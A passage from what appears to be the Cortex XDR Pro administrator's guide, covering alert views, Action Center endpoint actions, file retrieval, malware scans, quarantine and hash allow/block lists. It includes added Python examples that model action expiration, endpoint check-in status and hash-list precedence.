                               dots indicate multiple connections. Uploads and downloads are
                               indicated by a bar graph that shows the size of the upload and
                               download.
                             The lanes depict when activity occurred and provide additional
                             statistics that can help you investigate. For BIOCs and alerts, the
                             lanes also depict activity nodes, highlighted with their severity
                             color: high (red), medium (yellow), low (blue), or informational
                             (gray), and provide additional information about the activity when
                             you hover over the node.

Related events, alerts, and  Cortex XDR displays up to 100,000 alerts, BIOCs (triggered and
informational BIOCs          informational), and events. Click a node in the activity area of the
                             Timeline to filter the results you see here. As on other pages in
                             Cortex XDR, you can create filters to search for specific events.

Analytics Alert View
The analytics alert view provides a detailed summary of the behavior that triggered an Analytics or Analytics
BIOC alert. This view also provides a visual depiction of the behavior and additional information you can use
to assess the alert. This includes the endpoint on which the activity was initiated, the user that performed
the action, the technique the analytics engine observed, and activity and interactions with other hosts inside
or outside of your network.

Figure 1: Analytics View of an Analytics Alert

Section               Description

1. Context            For Analytics alerts, the analytics view indicates the endpoint for which the
                      alert was raised.
                      For Analytics BIOC alerts, the analytics view summarizes information about
                      the alert, including the source host name, IP address, the process name on
                      which the alert was raised, and the corresponding process ID.

2. Alert summary      (Analytics alerts only) Describes the behavior that triggered the alert and
                      the activity impact.

3. Graphic summary    Similar to the Causality View, the analytics view provides a graphic
                      representation of the activity that triggered the alert and an interactive
                      way to view the chain of behavior for an Analytics alert. You can move the
                      graphic, extend it, and modify it. To adjust the appearance, you can enlarge
                      or shrink the chain for easy viewing using the size controls on the right.
                      You can also move the chain around by selecting and dragging it. To return
                      the chain to its original position and size, use the reset control in the
                      lower-right of the graph.
                      The activity depicted in the graphic varies depending on the type of alert:
                      • Analytics alerts—You can view a summary of the aggregated activity,
                        including the source host, the anomalous activity, connection count, and
                        the destination host. You can also select the host to view any relevant
                        profile information.
                      • Analytics BIOC alerts—You can view the specific event behavior, including
                        the causality group owner that initiated the activity and related process
                        nodes. To view the summary of the specific event, select the icon above
                        the process node.
                      Right-click the following nodes to view additional information:
                      • Device—Open in IP View
                      • Process—View Process Instances
                      • IP Address—Add to EDL

4. Alert description  The alert description provides details and statistics related to the
                      activity. Beneath the description, you can also view the alert name, the
                      severity assigned to the alert, the time of the activity, the alert tactic
                      (category) and type, and links to the MITRE summary of the attack tactic.

5. Events table       Displays events related to the alert.

6. Response actions   Actions you can take in response to an Analytics alert. These actions can
                      include isolating a host from the network, initiating a live terminal
                      session, and adding an IP address or domain name to an external dynamic list
                      (EDL) that is enforceable in your Palo Alto Networks firewall security
                      policy.

Investigate Endpoints
Endpoint investigation requires either a Cortex XDR Prevent or a Cortex XDR Pro per
Endpoint license.

• Action Center
• View Details About an Endpoint
• Retrieve Files from an Endpoint
• Retrieve Support Logs from an Endpoint
• Scan an Endpoint for Malware

Action Center
The Action Center provides a central location from which you can track the progress of all investigation,
response, and maintenance actions performed on your Cortex XDR-protected endpoints. The main All
Actions tab of the Action Center displays the most recent actions initiated in your deployment. To narrow
down the results, click Filter on the top right.
You can also jump to filtered Action Center views for the following actions:
• Quarantine—View details about quarantined files on your endpoints. You can also switch to an
Aggregated by SHA256 view that collapses results per file and lists the affected endpoints in the Scope
field.
• Block List/Allow List—View files that are permitted and blocked from running on your endpoints
regardless of file verdict.
• Scripts Library—View Palo Alto Networks and administrator-uploaded scripts that you can run on your
endpoints.
• Isolation—View the endpoints in your organization that have been isolated from the network. For more
information, refer to Isolate an Endpoint.
• External Dynamic List—View the list of IP addresses and domain names in your EDL. For more
  information, refer to Manage External Dynamic Lists.
• Endpoint Blocked IP Addresses—View remote IP addresses that the Cortex XDR agent has automatically
blocked from communicating with endpoints in your network. For more information, refer to Add a New
Malware Security Profile.
For actions that can take a while to complete, the Action Center tracks the action progress and displays the
action status and current progress description for each stage. For example, after initiating an agent upgrade
action, Cortex XDR monitors all stages from the Pending request until the action status is Completed.
Throughout the action lifetime, you can view the number of endpoints on which the action was successful
and the number of endpoints on which the action failed.

The following table describes both the default and additional optional fields that you can view from the All
Actions tab of the Action Center and lists the fields in alphabetical order.

Field                 Description

Action Type           Type of action initiated on the endpoint (for example, Agent Upgrade).

Created By            The name of the user who initiated the action.

Creation Timestamp    Date and time the action was created.

Description           Includes the action scope of affected endpoints and additional data relevant
                      for each of the specific actions, such as agent version, file path, and file
                      hash.

Expiration Date       Date and time at which the action will expire. To set an expiration, the
                      action must apply to one or more endpoints.
                      By default, Cortex XDR assigns a 30-day expiration limit to the following
                      actions:
                      • Agent Uninstall
                      • Agent Upgrade
                      • Files Retrieval
                      • Isolate
                      • Cancel Endpoint Isolation
                      Additional actions such as malware scans, quarantine, and endpoint data
                      retrieval are assigned a 4-day expiration limit.
                      After the expiration limit, the status of any remaining Pending actions on
                      endpoints changes to Expired and those endpoints will not perform the action.

Status                The current status of the action:
                      • Pending—No endpoint has started to perform the action yet.
                      • In Progress—At least one endpoint has started to perform the action.
                      • Canceled—The action was canceled before any endpoint started performing
                        it.
                      • Pending Abort—An abort was requested but has not yet been applied to the
                        endpoints.
                      • Aborted—The action was canceled for all endpoints after at least one
                        endpoint had started performing it.
                      • Expired—The action expired before any endpoint started performing it.
                      • Completed with Partial Success—The action was completed on all endpoints.
                        However, some endpoints did not complete it successfully. Depending on the
                        action type, it may have failed, been canceled, expired, or failed to
                        retrieve all data.
                      • Completed Successfully—The action was completed successfully on all
                        endpoints.
                      • Failed—The action failed on all endpoints.
                      • Timeout—The action timed out on all endpoints.

Additional data—If additional details are available for an action or for specific endpoints, you can pivot
(right-click) to the Additional data view. You can also export the additional data to a TSV file. The page
can include the following fields, but the set varies depending on the type of action.

Endpoint Name         Target host name of each endpoint for which the action was initiated.

IP Addresses          IP address associated with the endpoint.

Status                Status of the action for the specific endpoint.

Action Last Update    Time at which the last status update occurred for the action.

Advanced Analysis     For Retrieve alert data requests related to XDR Alerts raised by exploit
                      protection modules, Cortex XDR can analyze the memory state for additional
                      verdict verification. This field displays the analysis progress and
                      resulting verdict.

Action Parameters     Summary of the action, including the alert name and alert ID.

Additional Data |     Additional data, if any is available, for the action. For malware scans, this
Malicious Files       field is titled Malicious Files and indicates the number of malicious files
                      identified during the scan.
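An added example, written for this page and not code from the guide or from Cortex XDR, of the Expiration
Date and Status rules in the table above: the 30-day versus 4-day default expiration, the rule that only
endpoints still Pending at the deadline become Expired, the Cancel for Pending endpoints behavior, and how
the per-endpoint statuses roll up into the single status the Action Center shows. The endpoint names, the
creation time, and the choice to pass an abort request as a flag are constructed assumptions; the product's
own roll-up logic is not published and may differ in details the table does not state.

```python
from datetime import datetime, timedelta
from typing import Dict

# Actions that Cortex XDR assigns a 30-day expiration by default; everything else
# (malware scans, quarantine, endpoint data retrieval, ...) gets 4 days.
THIRTY_DAY_ACTIONS = {"Agent Uninstall", "Agent Upgrade", "Files Retrieval",
                      "Isolate", "Cancel Endpoint Isolation"}

# Constructed time base used by the sample and the checks below.
DAY = timedelta(days=1)
CREATED = datetime(2020, 11, 2, 9, 0)


def expiration_date(action_type: str, created: datetime) -> datetime:
    days = 30 if action_type in THIRTY_DAY_ACTIONS else 4
    return created + days * DAY


def expire_pending(statuses: Dict[str, str], action_type: str,
                   created: datetime, now: datetime) -> Dict[str, str]:
    """Once the expiration limit passes, endpoints still Pending become Expired.
    Endpoints that already started or finished are untouched."""
    if now < expiration_date(action_type, created):
        return dict(statuses)
    return {ep: ("Expired" if s == "Pending" else s) for ep, s in statuses.items()}


def cancel_for_pending(statuses: Dict[str, str]) -> Dict[str, str]:
    """The 'Cancel for Pending endpoints' action: only endpoints that have not
    started are canceled; running or finished endpoints keep their status."""
    return {ep: ("Canceled" if s == "Pending" else s) for ep, s in statuses.items()}


def aggregate_status(statuses: Dict[str, str], abort_requested: bool = False) -> str:
    """Roll per-endpoint statuses up into the status shown for the whole action.
    abort_requested is an assumption standing in for the operator's abort; the page
    distinguishes Canceled (nothing had started) from Aborted (something had)."""
    values = set(statuses.values())
    if abort_requested:
        started = any(s not in ("Pending", "Canceled") for s in statuses.values())
        return "Aborted" if started else "Canceled"
    if values == {"Pending"}:
        return "Pending"
    if "Pending" in values or "In Progress" in values:
        return "In Progress"          # at least one endpoint started, not all finished
    uniform = {
        "Canceled": "Canceled",
        "Expired": "Expired",
        "Completed": "Completed Successfully",
        "Failed": "Failed",
        "Timeout": "Timeout",
    }
    if len(values) == 1:
        return uniform[next(iter(values))]
    return "Completed with Partial Success"   # all finished, mixed outcomes


def sample_timeline() -> Dict[str, str]:
    """Constructed walk-through: a malware scan where one host finished and one
    never checked in, evaluated five days after creation (past the 4-day limit)."""
    statuses = {"host-a": "Completed", "host-b": "Pending"}
    aged = expire_pending(statuses, "Malware Scan", CREATED, CREATED + 5 * DAY)
    return {"per_endpoint": str(aged), "overall": aggregate_status(aged)}
```

The practical reading of expire_pending is that a long-offline endpoint silently drops out of an Isolate or
Files Retrieval action after 30 days and out of a scan after 4; if the action matters, re-run it on those
agents rather than assuming Completed with Partial Success will catch up on its own.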

Manage Endpoint Actions
There are two ways you can initiate an endpoint action. You can Initiate an Endpoint Action from the
Action Center or you can initiate an action when you View Details About an Endpoint. Then, to monitor the
progress and status of an endpoint action, you can Monitor Endpoint Actions from the Action Center.
Initiate an Endpoint Action
You can create new administrative actions using the Action Center wizard in three easy steps:
1. Select the action type and configure its parameters.
2. Define the target agents for this action.
3. Review and confirm the action summary.

STEP 1 | Log in to Cortex XDR and go to Response > Action Center > +New Action.

STEP 2 | Select the action you want to initiate and follow the required steps and parameters you need
to define for each action.
Cortex XDR displays only the endpoints eligible for the action you want to perform.

STEP 3 | Review the action summary.
Cortex XDR will inform you if any of the agents in your action scope will be skipped. Click Done.

STEP 4 | Track your action.
Track the new action in the Action Center. The action status is updated according to the action progress,
as listed in the table above.

Monitor Endpoint Actions

STEP 1 | Log in to Cortex XDR and go to Response > Action Center.

STEP 2 | Select the relevant view.
Use the left-side menu on the Action Center page to monitor the different actions according to their
type:

• All—Lists all the administrative actions that were created in your network, including time of creation,
action type and description, action status, the name of the user who initiated the action, and the
action expiration date, if it exists.
• Quarantine—Lists only actions initiated to quarantine files on endpoints, including the file hash, file
name, file path and scope of target agents included in this action.
• Block List/Allow List—Lists only actions initiated to block or allow files, including file hash, status and
any existing comments.

STEP 3 | Filter the results.


To further narrow the results, use the Filters menu on the top of the page.

STEP 4 | Take further actions.


After inspecting an action log, you may want to take further action. Right-click the action and select one
of the following (where applicable):
• View additional data—Display more relevant details for the action, such as file paths for quarantined
files or operating systems for agent upgrades.
• Cancel for Pending endpoints—Cancel the original action for agents that are still in Pending status.
• Download output—Download a zip file with the files received from the endpoint for actions such as
file and data retrieval.
• Rerun—Launch the Create new action wizard populated with the same details as the original action.
• Run on additional agents—Launch the action wizard populated with the same details as the original
  action, except for the target agents, which you select.
• Restore—Restore quarantined files.

View Details About an Endpoint
The Endpoints > Endpoint Management > Endpoint Administration page provides a central location from
which you can view and manage the endpoints on which the Cortex XDR agent is installed. The right-click
pivot menu that is available for each endpoint displays the actions you can perform.

The following table describes the actions you can perform on your endpoints.

Field                 Action

Endpoint Control      • Open in interactive mode
                      • Perform Heartbeat
                      • Change Endpoint Alias
                      • Upgrade Agent Version (you cannot upgrade VDI endpoints)
                      • Retrieve Support File
                      • Set Endpoint Proxy
                      • Uninstall Agent
                      • Delete Endpoint
                      • Disable Capabilities (Live Terminal, Script Execution, and File Retrieval)

Security Operations   • Retrieve Endpoint Files
                      • Initiate Malware Scan
                      • Abort Malware Scan
                      • Initiate Live Terminal
                      • Isolate Endpoint

Endpoint Data         • View Incidents (in the same tab or a new tab)
                      • View Endpoint Policy
                      • View Actions
                      • View Endpoint Logs

The following table describes both the default and additional optional fields that you can view in the
Endpoints table. The table lists the fields in alphabetical order.

Field Description

Check box to select one or more endpoints on which to perform actions.

Active Directory Lists all Active Directory Groups and Organizational Units to which the user
belongs.

Assigned Policy Policy assigned to the endpoint.

Auto Upgrade Status When Agent Auto Upgrades are enabled, indicates the action status is either:
• In progress—Indicates that the Cortex XDR agent upgrade is in progress
on the endpoint.
• Up to date—Indicates that the current Cortex XDR agent version on the
endpoint is up to date.
• Failure—Indicates that the Cortex XDR agent upgrade failed after three
retries.
• Not configured—Indicates that automatic agent upgrades are not
configured for this endpoint.
• Pending—Indicates that the Cortex XDR agent version running on the
endpoint is not up to date, and the agent is waiting for the upgrade
message from Cortex XDR.

272 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response


© 2020 Palo Alto Networks, Inc.
Field Description
• Not supported—Indicates this endpoint type does not support automatic
agent upgrades. Relevant for VDI, TS, or Android endpoints.

Content Auto Update Indicates whether automatic content updates are Enabled or Disabled for the
endpoint. See Agent Settings profile.

Content Rollout Delay If you configured delayed content rollout, the number of days for delay is
(days) displayed here. See Agent Settings profile.

Content Version Content update version used with the Cortex XDR agent.

Disabled Capabilities A list of the capabilities that were disabled on the endpoint. To disable one or
more capabilities, right-click the endpoint name and select Endpoint Control >
Disable Capabilities. Options are:
• Live Terminal
• Script Execution
• File Retrieval
You can disable these capabilities during the Cortex XDR agent installation
on the endpoint or through Endpoint Administration. Disabling any of
these actions is irreversible, so if you later want to enable the action on the
endpoint, you must uninstall the Cortex XDR agent and install a new package
on the endpoint.

Domain Domain or workgroup to which the endpoint belongs, if applicable.

Endpoint Alias If you assigned an alias to represent the endpoint in Cortex XDR, the alias
is displayed here. To set an endpoint alias, right-click the endpoint name,
and select Change endpoint alias. The alias can contain any of the following
characters: a-Z, 0-9, !@#$%^&()-'{}~_.

Endpoint ID Unique ID assigned by Cortex XDR that identifies the endpoint.

Endpoint Isolated Isolation status, either:


• Isolated—The endpoint has been isolated from the network with
communication permitted to only Cortex XDR and to any IP addresses and
processes included in the allow list.
• Not Isolated—Normal network communication is permitted on the
endpoint.
• Pending Isolation—The isolation action has reached the server and is
pending contact with the endpoint.
• Pending Isolation Cancellation—The cancel isolation action has reached
the server and is pending contact with the endpoint.

Endpoint Name Hostname of the endpoint. If the agent enables Pro features, this field also
includes a PRO badge.

Endpoint Status Registration status of the Cortex XDR agent on the endpoint:

• Connected—The Cortex XDR agent has checked in within 10 minutes for
standard endpoints, and within 3 hours for mobile endpoints.
• Connection Lost—The Cortex XDR agent has not checked in within 30 to
180 days for standard endpoints, and between 90 minutes and 6 hours for
VDI and temporary sessions.
• Disconnected—The Cortex XDR agent has checked in within the defined
inactivity window: between 10 minutes and 30 days for standard and
mobile endpoints, and between 10 minutes and 90 minutes for VDI and
temporary sessions.
• VDI Pending Log-on—(Windows only) Indicates a non-persistent VDI
endpoint is waiting for user logon, after which the Cortex XDR agent
consumes a license and starts enforcing protection.
• Uninstalled—The Cortex XDR agent has been uninstalled from the
endpoint.
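The check-in windows above overlap (a mobile endpoint is Connected within 3 hours but Disconnected from 10 minutes), so it helps to see the rule applied as a classifier. The following is an added example, not code from the guide or from Cortex XDR: it turns the Endpoint Status windows into a function and uses it to list endpoints that have gone dark in a constructed inventory. The kind labels "standard", "mobile" and "vdi", the "Stale" status for endpoints past the Connection Lost window, and the 180-day Connection Lost bound for mobile endpoints (which the guide does not state) are assumptions.

```python
from datetime import datetime, timedelta
from typing import Iterable, List, Tuple

# Check-in windows taken from the Endpoint Status field description above.
# The kind labels "standard", "mobile" and "vdi" (VDI and temporary sessions)
# are constructed for this example and are not Cortex XDR field values.
# Each tuple holds the (connected, disconnected, connection_lost) upper bounds.
CHECK_IN_WINDOWS = {
    "standard": (timedelta(minutes=10), timedelta(days=30), timedelta(days=180)),
    # Assumption: the guide gives no Connection Lost window for mobile
    # endpoints, so the standard 180-day bound is reused here.
    "mobile": (timedelta(hours=3), timedelta(days=30), timedelta(days=180)),
    "vdi": (timedelta(minutes=10), timedelta(minutes=90), timedelta(hours=6)),
}


def status_for_age(age_seconds: float, kind: str = "standard") -> str:
    """Classify an endpoint by the number of seconds since its last check-in.

    The windows are checked from shortest to longest, so the Connected bound
    wins where the guide's ranges overlap (a mobile endpoint seen two hours
    ago is Connected, not Disconnected).
    """
    connected, disconnected, lost = CHECK_IN_WINDOWS[kind]
    age = timedelta(seconds=age_seconds)
    if age <= connected:
        return "Connected"
    if age <= disconnected:
        return "Disconnected"
    if age <= lost:
        return "Connection Lost"
    # The guide lists no status beyond the Connection Lost window; treat such
    # endpoints as stale inventory that needs a manual look (assumed label).
    return "Stale"


def endpoint_status(last_seen: datetime, now: datetime, kind: str = "standard") -> str:
    """Same classification, taking the Last Seen timestamp and the current time."""
    return status_for_age((now - last_seen).total_seconds(), kind)


def dark_endpoints(inventory: Iterable[Tuple[str, str, datetime]],
                   now: datetime) -> List[Tuple[str, str]]:
    """Return (name, status) for every endpoint that is not Connected.

    inventory holds (endpoint name, kind, last seen) tuples, the same values
    an analyst would export from the Endpoints table.
    """
    flagged = []
    for name, kind, last_seen in inventory:
        status = endpoint_status(last_seen, now, kind)
        if status != "Connected":
            flagged.append((name, status))
    return flagged


if __name__ == "__main__":
    # Constructed inventory; names and times are placeholders.
    now = datetime(2020, 11, 2, 12, 0, 0)
    inventory = [
        ("ws-001", "standard", now - timedelta(minutes=4)),
        ("ws-002", "standard", now - timedelta(days=2)),
        ("srv-db-01", "standard", now - timedelta(days=45)),
        ("vdi-pool-17", "vdi", now - timedelta(hours=2)),
        ("phone-sales-3", "mobile", now - timedelta(hours=2)),
    ]
    for name, status in dark_endpoints(inventory, now):
        print(f"{name}: {status}")
```

A VDI session seen two hours ago is already Connection Lost while a workstation seen two hours ago is only Disconnected; running the inventory through this function is a quick way to spot agents that stopped reporting well before the console would show the change.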

Endpoint Type Type of endpoint: Mobile, Server, or Workstation.

Endpoint Version Version of the Cortex XDR agent that runs on the endpoint.

First Seen Date and time the Cortex XDR agent first checked in (registered) with Cortex
XDR.

Golden Image ID For endpoints with a System Type of Golden Image, the image ID is a unique
identifier for the golden image.

Group Names Endpoint groups of which the endpoint is a member, if applicable. See Define
Endpoint Groups.

Incompatibility Mode Cortex XDR agent incompatibility status, either:


• Agent Incompatible—The Cortex XDR agent is incompatible with the
environment and cannot recover.
• OS Incompatible—The Cortex XDR agent is incompatible with the
operating system.
When Cortex XDR agents are compatible with the operating system and
environment, this field is blank.

Isolation Date Date and time of when the endpoint was Isolated. Displayed only for
endpoints in Isolated or Pending Isolation Cancellation status.

Install Date Date and time at which the Cortex XDR agent was first installed on the
endpoint.

Installation Package Installation package name used to install the Cortex XDR agent.

Installation Type Type of installation:


• Standard
• VDI

• Golden Image
• Temporary Session

IP Last known IPv4 or IPv6 address of the endpoint.

Is EDR Enabled Whether EDR data is enabled on the endpoint.

Last Scan Date and time of the last malware scan on endpoint.

Last Seen Date and time of the last change in an agent's status. This can occur when
Cortex XDR receives a periodic status report from the agent (once an hour), a
user performed a manual Check In, or a security event occurred.

Changes to the agent status can take up to ten minutes to display in Cortex XDR.

Last Used Proxy The IP address and port number of proxy that was last used for
communication between the agent and Cortex XDR.

Last Used Proxy Port Last proxy port used on endpoint.

MAC The endpoint MAC address that corresponds to the IP address.

Network Location (Cortex XDR agent 7.1 and later for Windows and Cortex XDR agent 7.2 and
later for macOS and Linux) Endpoint location as reported by the Cortex XDR
agent:
• Internal
• External
• Not Supported—The Cortex XDR agent is running a prior agent version
that does not support network location reporting.
• Disabled—The Cortex XDR agent was unable to identify the network
location.

Operating System Name of operating system.

Operational Status Cortex XDR agent operational status:


• Protected—Indicates that the Cortex XDR agent is running as configured
and did not report any exceptions to Cortex XDR.
• Partially protected—Indicates that the Cortex XDR agent reported one or
more exceptions to Cortex XDR.
• Unprotected—Indicates the Cortex XDR agent was shut down.

OS Description Operating system version name.

OS Type Name of the operating system.

OS Version Operating system version number.


Platform Platform architecture.

Proxy IP address and port number of the configured proxy server.

Scan Status Malware scan status, either:


• None—No scan initiated
• Pending—Scan was initiated, waiting for action to reach endpoint.
• In Progress—Scan in process.
• Success—Scan completed.
• Pending Cancellation—Scan was aborted, waiting for action to reach
endpoint.
• Canceled—Scan canceled.
• Error—Scan failed to run.

Users User who last logged in to the endpoint. On Android endpoints, the
Cortex XDR app identifies the user from the email prefix specified during app
activation.

Retrieve Files from an Endpoint


If during an investigation you want to retrieve files from one or more endpoints, you can initiate a file
retrieval request from Cortex XDR.
For each file retrieval request, Cortex XDR supports up to:
• 20 files
• 500MB in total size
• 10 different endpoints
The request instructs the agent to locate the files on the endpoint and upload them to Cortex XDR. The
agent collects all requested files into one archive and includes a log in JSON format containing additional
status information. When the files are successfully uploaded, you can download them from the Action
Center.
To retrieve files from one or more endpoints:

STEP 1 | Log in to Cortex XDR.


Go to Response > Action Center > + New Action.

STEP 2 | Select Files Retrieval and click Next.

STEP 3 | Select the operating system and enter the paths for the files you want to retrieve, pressing
ADD after each completed path.

You cannot define a path using environment variables on Mac and Linux endpoints.

STEP 4 | Click Next.

STEP 5 | Select the target endpoints (up to 10) from which you want to retrieve files.

If needed, Filter the list of endpoints. For more information, refer to Filter Page Results.

STEP 6 | Click Next.

STEP 7 | Review the action summary and click Done when finished.
To track the status of a files retrieval action, return to the Action Center. Cortex XDR retains retrieved
files for up to 30 days.
If at any time you need to cancel the action, you can right-click it and select Cancel for pending
endpoint. You can cancel the retrieval action only if the endpoint is still in Pending status and no
files have been retrieved from it yet. The cancellation does not affect endpoints that are already in the
process of retrieving files.

STEP 8 | To view additional data and download the retrieved files, right-click the action and select
Additional data.
This view displays all endpoints from which files are being retrieved, including their IP Address, Status,
and Additional Data such as error messages or the names of files that were not retrieved.

STEP 9 | When the action status is Completed Successfully, you can right-click the action and
download the retrieved files and logs.
Cortex XDR retains retrieved files for up to 30 days.

Disable File Retrieval


If you want to prevent Cortex XDR from retrieving files from an endpoint running the Cortex XDR
agent, you can disable this capability during agent installation or later on through Cortex XDR Endpoint
Administration. Disabling file retrieval is irreversible. If you later want to re-enable this capability on the
endpoint, you must re-install the Cortex XDR agent. See the Cortex XDR agent administrator’s guide for
more information.

Disabling File Retrieval does not take effect on file retrieval actions that are in progress.

Retrieve Support Logs from an Endpoint


When you need to send additional forensic data to Palo Alto Networks Technical Support, you can initiate
a request to retrieve all support logs and alert data dump files from an endpoint. After Cortex XDR receives
the logs, you can then download and send them to Technical Support.

STEP 1 | Log in to Cortex XDR.


Go to Response > Action Center > + New Action.

STEP 2 | Select Retrieve Support File and click Next.

STEP 3 | Select the target endpoints (up to 10) from which you want to retrieve logs.

If needed, Filter the list of endpoints. For more information, refer to Filter Page Results.

STEP 4 | Click Next.

STEP 5 | Review the action summary and click Done when finished.
At the next heartbeat, the agent retrieves the request, packages all logs, and sends them to Cortex XDR.

STEP 6 | To track the status of a support log retrieval action, return to the Action Center.
When the status is Completed Successfully, you can right-click the action and download the
support logs. Cortex XDR retains retrieved files for up to 30 days.
If at any time you need to cancel the action, you can right-click it and select Cancel for pending
endpoint. You can cancel the retrieval action only if the endpoint is still in Pending status and no
files have been retrieved from it yet. The cancellation does not affect endpoints that are already in the
process of retrieving files.

STEP 7 | To view additional data and download the support logs, right-click the action and select
Additional data.
You will see all endpoints from which files are being retrieved, including their IP Address, Status, and
Additional Data.

STEP 8 | When the action status is Completed Successfully, you can right-click the action and
download the retrieved logs.
Cortex XDR retains retrieved files for up to 30 days.

Scan an Endpoint for Malware


In addition to blocking the execution of malware, the Cortex XDR agent can scan your Windows and Mac
endpoints and attached removable drives for dormant malware that is not actively attempting to run. The
Cortex XDR agent examines the files on the endpoint according to the Malware security profile that is in
effect on the endpoint (quarantine settings, unknown file upload, and so on). When a malicious file is detected
during the scan, the Cortex XDR agent reports the malware to Cortex XDR so that you can manually take
additional action to remove the malware before it is triggered and attempts to harm the endpoint.

You can scan the endpoint in the following ways:
• System scan—Initiate a full scan on demand from Endpoints Administration for an endpoint. To initiate a
system scan, see Initiate a Full Scan from Cortex XDR.
• Periodic scan—Configure periodic full scans that run on the endpoint as part of the malware security
profile. To configure periodic scans, see Add a New Malware Security Profile.
• Custom scan—(Windows, requires a Cortex XDR agent 7.1 or later release) The end user can initiate a
scan on demand to examine a specific file or folder. For more information, see the Cortex XDR agent
administrator’s guide for Windows.

Initiate a Full Scan from Cortex XDR


You can initiate full scans of one or more endpoints from either Endpoint Administration or the Action
Center. After initiating a scan, you can monitor the progress from Response > Action Center. From both
locations, you can also abort an in-progress scan. The time a scan takes to complete depends on the number
of endpoints, connectivity to those endpoints, and the number of files for which Cortex XDR needs to
obtain verdicts.
To initiate a scan from Cortex XDR:

STEP 1 | Log in to Cortex XDR.


Select Response > Action Center > +New Action.

STEP 2 | Select Malware Scan.

STEP 3 | Click Next.

STEP 4 | Select the target endpoints (up to 100) on which you want to scan for malware.
Scanning is available on Windows and Mac endpoints only. Cortex XDR automatically filters out any
endpoints for which scanning is not supported. Scanning is also not available for inactive endpoints.

If needed, Filter the list of endpoints by attribute or group name.

STEP 5 | Click Next.

STEP 6 | Review the action summary and click Done when finished.
Cortex XDR initiates the action at the next heartbeat and sends the request to the agent to initiate a
malware scan.

STEP 7 | To track the status of a scan, return to the Action Center.


When the status is Completed Successfully, you can view the scan results.

STEP 8 | View the scan results.


After a Cortex XDR agent completes a scan, it reports the results to Cortex XDR.
To view the scan results for a specific endpoint:
1. On Action Center, when the scan status is complete, right-click the scan action and select Additional
data.
Cortex XDR displays additional details about the endpoint.

2. Right-click the endpoint for which you want to view the scan results and select View related security
events.
Cortex XDR displays a filtered list of malware alerts for files that were detected on the endpoint
during the scan.

Investigate Files
• Manage File Execution
• Manage Quarantined Files
• Review WildFire Analysis Details
• Investigate Hash View

Manage File Execution


You can manage file execution on your endpoints using file hashes included in your allow and block lists. If
you trust a certain file and know it to be benign, you can add the file hash to the allow list and allow it to be
executed on all your endpoints regardless of the WildFire or local analysis verdict. Similarly, if you want to
always block a file from running on any of your endpoints, you can add the associated hash to the block list.
Adding files to the block list or allow list takes precedence over any other policy rules that would otherwise
have applied to these files. In the Action Center in Cortex XDR, you can monitor block list and allow list
actions performed in your networks and add or remove files from these lists.

STEP 1 | Log in to Cortex XDR.


Go to Response > Action Center > + New Action.

STEP 2 | Select either Add to Block List or Add to Allow List.

STEP 3 |
Enter the SHA256 hash of the file and click .
You can add up to 100 file hashes at once. You can add a comment that will be added to all the hashes
you added in this action.

STEP 4 | Click Next.

STEP 5 | Review the summary and click Done.


At the next heartbeat, the agent retrieves the updated lists from Cortex XDR.

STEP 6 | You are automatically redirected to the Block List or Allow List that corresponds to the action
in the Action Center.

STEP 7 | To manage the file hashes on the Block List or the Allow List, right-click the file and select one
of the following:
• Disable—The file hash remains on the list but will not be applied on your Cortex XDR agents.
• Move to Block List or Move to Allow List—Removes this file hash from the current list and adds it to
the opposite one.
• Edit Incident ID—Select to either Link to existing incident or Remove incident link.
• Edit Comment—Enter a comment.
• Delete—Delete the file hash from the list altogether, meaning this file hash will no longer be applied
to your endpoints.
• Open in VirusTotal—Directs you to the VirusTotal analysis of this hash.
• (Cortex XDR Pro License only) Open Hash View—Pivot to the Hash View for the hash.
• Open in Quick Launcher—Open the quick launcher search results for the hash.

Manage Quarantined Files
When the Cortex XDR agent detects malware on a Windows endpoint, you can take additional precautions
to quarantine the file. When the Cortex XDR agent quarantines malware, it moves the file from the location
on a local or removable drive to a local quarantine folder (%PROGRAMDATA%\Cyvera\Quarantine) where
it isolates the file. This prevents the file from attempting to run again from the same path or causing any
harm to your endpoints.
To evaluate whether an executable file is considered malicious, the Cortex XDR agent calculates a verdict
using information from the following sources in order of priority:
• Hash exception policy
• WildFire threat intelligence
• Local analysis
Quarantining a file in Cortex XDR can be done in one of two ways:
• You can enable the Cortex XDR agent to automatically quarantine malicious executables by configuring
quarantine settings in the Malware security profile.
• You can quarantine a specific file from the causality card.
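The Manage File Execution section and the verdict priority just listed describe one decision: an enabled allow or block list entry for a hash overrides the WildFire verdict, which in turn overrides local analysis, and a disabled entry stays on the list without being applied. The following is an added example, not code from the guide or from Cortex XDR, that models the two lists with that precedence, enforces the SHA256 format and the 100-hashes-per-action limit stated above, and implements the Disable and Move to Block List / Move to Allow List actions. The class and method names, the verdict strings ("benign", "malware", "unknown") and the rule that a hash may sit on only one list at a time are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, Optional, Tuple

SHA256_RE = re.compile(r"^[0-9a-fA-F]{64}$")
MAX_HASHES_PER_ACTION = 100  # per-action limit stated under Manage File Execution


@dataclass
class ListEntry:
    sha256: str
    comment: str = ""
    incident_id: Optional[str] = None
    enabled: bool = True  # "Disable" keeps the hash on the list without applying it


class HashExceptionPolicy:
    """Allow and block lists keyed by lower-case SHA256 (example model, not the product's).

    A hash lives on at most one list at a time, mirroring the Move to Block
    List / Move to Allow List actions, which remove it from the other list.
    """

    def __init__(self) -> None:
        self.allow: Dict[str, ListEntry] = {}
        self.block: Dict[str, ListEntry] = {}

    def _lists(self, target: str) -> Tuple[Dict[str, ListEntry], Dict[str, ListEntry]]:
        if target == "allow":
            return self.allow, self.block
        if target == "block":
            return self.block, self.allow
        raise ValueError(f"unknown list: {target!r}")

    def add(self, target: str, hashes: Iterable[str], comment: str = "") -> int:
        """Add hashes to one list; rejects malformed hashes and cross-list conflicts."""
        hashes = [h.strip() for h in hashes]
        if len(hashes) > MAX_HASHES_PER_ACTION:
            raise ValueError(f"at most {MAX_HASHES_PER_ACTION} hashes per action")
        dest, other = self._lists(target)
        for h in hashes:
            if not SHA256_RE.match(h):
                raise ValueError(f"not a SHA256 hash: {h!r}")
            key = h.lower()
            if key in other:
                raise ValueError(f"{key} is already on the opposite list; move it instead")
            dest[key] = ListEntry(key, comment)
        return len(hashes)

    def move(self, sha256: str) -> str:
        """Move a hash to the opposite list; returns the name of its new list."""
        key = sha256.lower()
        for src, dst, name in ((self.allow, self.block, "block"),
                               (self.block, self.allow, "allow")):
            if key in src:
                dst[key] = src.pop(key)
                return name
        raise KeyError(key)

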